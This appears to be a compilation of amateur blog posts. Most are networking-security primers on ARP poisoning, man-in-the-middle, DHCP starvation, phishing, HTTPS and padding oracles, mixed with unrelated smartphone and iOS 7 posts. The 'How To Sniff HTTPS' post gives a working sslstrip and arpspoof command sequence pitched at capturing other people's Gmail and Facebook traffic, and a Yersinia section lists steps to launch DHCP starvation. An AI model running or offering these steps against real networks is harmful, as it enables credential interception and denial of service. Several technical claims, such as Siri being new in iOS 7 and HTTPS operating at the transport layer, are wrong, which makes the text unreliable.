Rainbow Table In Cryptography

A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering the plaintext password, up to a certain length consisting of a limited set of characters. It is a practical example of a space/time trade-off, using more computer processing time at the cost of less storage when calculating a hash on every attempt, or less processing time and more storage when compared to a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.

How To Sniff HTTPS

If you want to sniff websites having https environment then you should try SSL Strip it helps you to sniff https sites. Like Gmail Yahoo And Facebook.

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)


Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )


Run sslstrip. (sslstrip.py -l <listenPort>)


Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

What Is APR Positioning

APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name "ARP Poison Routing" derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination.
ARP Stands For Address Resolvation Protocol
ARP Poison Attack

This kind of attack is based on the manipulation of host's ARP caches. On an Ethernet/IP network when two hosts want to communicate to each other they must know each others MAC addresses. The source host looks at its ARP table to see if there is a MAC address corresponding to the destination host IP address. If not, it broadcasts an ARP Request to the entire network asking the MAC of the destination host. Because this packet is sent in broadcast it will reach every host in a subnet however only the host with the IP address specified in the request will reply its MAC to the source host. On the contrary if the ARP-IP entry for the destination host is already present in the ARP cache of the source host, that entry will be used without generating ARP traffic. We Can Use Cain And Cable Software For APR Posioning.
You can Also See That With A Short Flash File.

Man In The Middle Attack

Monkey In The Middle Attack Is also Known As :

• Man-in-the-middle attack
• Bucket-brigade attack
• Fire brigade attack
• Session hijacking
• TCP hijacking
• TCP session hijacking

This is an Attack used for gathering data from any victim which is connected to the web server by a Simple Hacking Trick. In That Case A Hacker (Attacker) Breaches the connection of his victim to the server and then he gets the connection of victim's computer sends his all requests to the web server but he steals all his information and victim thinks that he is directly connected to the web Server. But in reality The victim is connected through a Hackers PC (Third Person). And Hacker Stealing his all data like Data Packets , Passwords , usernames and more his confidential data. This Is called Man In The Middle Attack.

DHCP Starvation Attack

This type of attack can easily be achieved with tools such as gobbler. If enough requests flooded onto the network, the attacker can completely exhaust the address space allocated by the DHCP servers for an indefinite period of time. Clients of the victim network are then starved of the DHCP resource(s), thus DHCP Starvation can be classified as a Denial of Service attack. The network attacker can then set up a Rogue DHCP Server on the network and perform man in the middle attacks, or simply set their machine as the default gateway and sniff packets.

Exhausting all of the DHCP addresses may make a Rogue DHCP Server more affective, but it is not manditory. As stated in RFC 2131:
"The client collects DHCPOFFER messages over a period of time, selects one DHCPOFFER message from the (possibly many) incoming DHCPOFFER messages (for example, the first DHCPOFFER message or the DHCPOFFER message from the previously used server) and extracts the server address from the `server identifier' option in the DHCPOFFER message. The time over which the client collects messages and the mechanism used to select one DHCPOFFER are implementation dependent."
Attack Vector

Yersinia DHCP Starvation Attack

Attack Vector

Yersinia is a GNU/Linux framework that takes advantage of some of the weaknesses in different network protocols. It can be used for analyzing and testing deployed networks and systems. To use Yersinia for a DHCP Starvation Attack, the following steps may be followed:

1.Start Yersinia via the command line by typing: yersinia -I.

2.Select a NIC you wish to use by pressing “i”.

3.Load DHCP mode by pressing the “g” key, then select DHCP mode.

4.Press the “x” button to open the attacks menu.

5.Press “1” to start the attack

  

                                                   Yersinia DHCP Starvation Attack

Compare The samsung galaxy s4, the htc one and iphone 5

Samsung Galaxy S4

The Samsung Galaxy s4 has many good features running on android 4.1 Jellybean Operating System.

Like Galxy s4 has a 70*137 Dimensions And 7.9 mm thickness. and 130 gram weight.

The Samsung Galaxy Series Hava A good resolution devices like s4 has 1080/1920 Resolution With 441 ppi (pixel per inches.)

And it also has a good processor of 1.9 ghz with 4cores and 2 gb ram.

And IT has a good rear camera of 13 MP and Front cam of 2 Mp. with 1080p video quality.

HTC ONE

Operating System = Andoid 4.1 upgradable up to 4.2 Google Version

Dimensions= 1080*1920 with 469ppi

Processor= 1.7 Ghz 4 cores with 2 GB Ram.

Camera = 4Mp (ultrapixel) Rear And 2 Mp Front Camera.

Video Quality= 1080/1080p

Apple Iphone 5

Latest Smartphone Of Apple With ios 6

Dimensions = 59*124 With 7.6 mm Thickness

And Resolution is 640*1136 With 326 ppi

What IS NEw In Apple's ios 7

Control Centre

Apple Has Configured Many Good Features in His Upcoming Apple ios 7.in That The First Good Thing About This is Control Centre.

In The Control Centre We Can See The All Important Icons We Use In Our Daily Life.Like Bluetooth Night mode, brightness, camera, torch,clock and music player (ipod )flight mode etc.

Air Drop

Air Drop Is a Function That can be used for share contacts and other apps another good option ios 7 has a good feature than io6 

Siri

Siri Is A New Function In Ios7 That can be used to talk with your device very clearly as you are talking to human. and it is a symbol of excellence of apple's ios 7

and ios 7 has many other good features like safari and multitasking which are upgraded with ios 6

How To Secure Your Pc With Phishing

Phishing Is Technique Which Is old But Effective Till Now To Get The Username And Password Of a Hackers Victim.

 How It Works?

A Person (Hacker) Who Wants To Get The Password And Username Of His Victim's Account Like Victim's Facebook account Email And Password Or Yahoo, google , hotmail , Twitter Etc. Makes A Fake Page As Shown As In THe Original Website. And Sends A Message To his Victim That His Victim Should Open The Link He Has Shown Like He Gives A Url Of The Website To Open And Whaen Victim Opens The Url And Try To Login In  The Website By Email Or Password The Both Thing Goes To The Hacker.
And Hacker gets Access To enter in his victim's Account.

Example:
If Someone Want To Hack Your Facebook Password And email By Phishing He Will Make A Duplicate Page Of Facebook (By Copying Page Source Of Facebook Page) And He Will Send  You a Tricky Message To Sign in The Facebook Via His Given Url. And When You Will Try To Log In Via Your Email And Password You Will Be Asked To Login again And The First Time You Entered The Email And Password Will Go to The File Of Hackers Account Which He Had Made To Get All Password.

How To Secure yourself With Phishing

1. Don't Try To Response The Mails And Messages By unknown Sender (Hackers Uses a Girl's Name to send the message To get victim).

2. Don't Open The url Given In The Message.

3.When You Are Logging In See The Url Of Site Is proper or not.

How To Find vulnerability Of A Hackers Fake Page (Example Of Facebook)

In The Image Url Is Wrong (write url is http://www.facebook.com)

And There Are ????? instead of languages

Protocol We Need For A Communication

SMTP

Stands for "Simple Mail Transfer Protocol." This is the protocol used for sending e-mail over the Internet. Your e-mail client (such as Outlook, Eudora, or Mac OS X Mail) uses SMTP to send a message to the mail server, and the mail server uses SMTP to relay that message to the correct receiving mail server. Basically, SMTP is a set of commands that authenticate and direct the transfer of electronic mail. When configuring the settings for your e-mail program, you usually need to set the SMTP server to your local Internet Service Provider's SMTP settings (i.e. "smtp.yourisp.com").

FTP

Stands for "File Transfer Protocol." It is a common method of transferring files via the Internet from one computer to another. Some common FTP programs are "Fetch" for the Mac, and "WS_FTP" for Windows. However, you can also use a Web browser like Netscape or Internet Explorer to access FTP servers. To do this, you need to type the URL of the server into the location field of the browser. For example: "ftp://ftp.servername.com/" will give you a listing of all the directories of the FTP server, "ftp://ftp.servername.com/directory/" will give you a listing of all the files available in that directory, and "ftp://ftp.servername.com/directory/filename" will download the actual file to your computer. Many FTP servers are "anonymous FTP" servers which means you can log in with the user name "anonymous" and your e-mail address as the password. Other FTP servers require a specific login in order to access the files.

POP3

Stands for "Post Office Protocol." POP3, sometimes referred to as just "POP," is a simple, standardized method of delivering e-mail messages. A POP3 mail server receives e-mails and filters them into the appropriate user folders. When a user connects to the mail server to retrieve his mail, the messages are downloaded from mail server to the user's hard disk.

VoIP
Stands for "Voice Over Internet Protocol," and is often pronounced "voip." VoIP is basically a telephone connection over the Internet. The data is sent digitally, using the Internet Protocol (IP) instead of analog telephone lines. This allows people to talk to one another long-distance and around the world without having to pay long distance or international phone charges.

In order to use VoIP, you need a computer, an Internet connection, and VoIP software. You also need either a microphone, analog telephone adapter, or VoIP telephone. Many VoIP programs allow you to use a basic microphone and speaker setup. Others requires VoIP phones, which are like regular telephone handsets, but typically connect to your computer via USB. Analog telephone adapters allow you to use regular phones with your computer. IP phones are another option that connect directly to a router via Ethernet or wirelessly. These phones have all the necessary software for VoIP built in and therefore do not require a computer.

The largest provider of VoIP services is Vonage, but there are several other companies that offer similar services.

Diffrence Between http and https

http:
HTTP is Hyper Text Transform Protocol and is transmitted over the wire via PORT 80(TCP). You use HTTP when you are browsing the web.
https:
HTTPS (Hypertext Transfer Protocol over Secure Socket Layer, or HTTP over SSL) is a Web protocol developed by Netscape and built into its browser that encrypts and decrypts user page requests as well as the pages that are returned by the Web server.
We Can also Say That HTTPS = http + ssl (Secure Socket Layer)

Difference between HTTP and HTTPS:

1. URL begins with “http://" in case of HTTP while the URL begins with “https://” in case of HTTPS.
2. HTTP is unsecured while HTTPS is secured.
3. HTTP uses port 80 for communication while HTTPS uses port 443 for communication.
4. HTTP operates at Application Layer while HTTPS operates at Transport Layer.
5. No encryption is there in HTTP while HTTPS uses encryption.

6. No certificates required in HTTP while certificates required in HTTPS.

HTTP includes the following actions:

1. The browser opens a TCP connection.
2. The browser sends a HTTP request to the server
3. The server sends a HTTP response to the browser. 4. The TCP connection is closed.

SSL will include the following actions:

1. Authenticate the server to the client.
2. Allow the client and server to select the cryptographic algorithms, or ciphers, that they both support.
3. Optionally authenticate the client to the server.
4. Use public-key encryption techniques to generate shared secrets.
5. Establish an encrypted SSL connection.
6. Once the SSL connection is established the usual transfer of HTTP requests will continue.

HTTPS includes Both HTTP and SSL (secure Socket Layer) Actions.

Https Should Be Used In Banking Websites, Payment Gateway , Shopping Websites etc.

Example of HTTPS : https://www.paypal.com/

Side Channel Attack

In cryptography, a side channel attack is any attack based on information gained from the physical 
lementation of a cryptosystem, rather than brute force or theoretical weaknesses in the algorithms
(compare cryptanalysis). For example, timing information, power consumption, electromagneticleaks 
or even sound can provide an extra source of information which can be exploited to break the system.
Some side-channel attacks require technical knowledge of the internal operation of the system on 
which the cryptography is implemented, although others such as differential power analysis are 
effective as black-box attacks. Many powerful side channel attacks are based on statistical methods
pioneered by Paul Kocher.

What Is Padding Oracle Attack

Padding oracle attack

In cryptography, a padding oracle attack is a side channel attack which is performed on the padding

of a cryptographic message. The plain text message often has to be padded (expanded) to be 

compatible with the underlying cryptographic primitive. Leakage of information about the padding may

occur mainly during decryption of the ciphertext. Padding oracle attacks are mostly associated with 

ECB or CBC mode decryption used within block ciphers. Padding modes for asymmetric algorithms

such as OAEP may also be vulnerable to padding oracle attacks.

Attacks using padding oracles

The original attack was published in 2002 by Serge Vaudenay. In 2010 the attack was applied to

encrypted HTTP cookies in several web application frameworks, including JavaServer Faces,Ruby

on Rails and ASP.NET. In 2012 it was shown to be effective against some hardened security devices.

While these earlier attacks were fixed by most TLS implementors following its public announcement, a

new variant, the Lucky Thirteen attack, published in 2013, used a timing side-channel to re-open the

vulnerability even in implementations that had previously been fixed. As of February 2013, TLS

implementors are still working on developing fixes for their TLS code.